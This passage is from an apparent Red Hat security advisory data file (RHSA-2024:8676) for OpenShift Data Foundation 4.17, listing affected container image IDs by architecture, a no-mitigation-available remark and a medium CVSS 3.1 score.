"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", 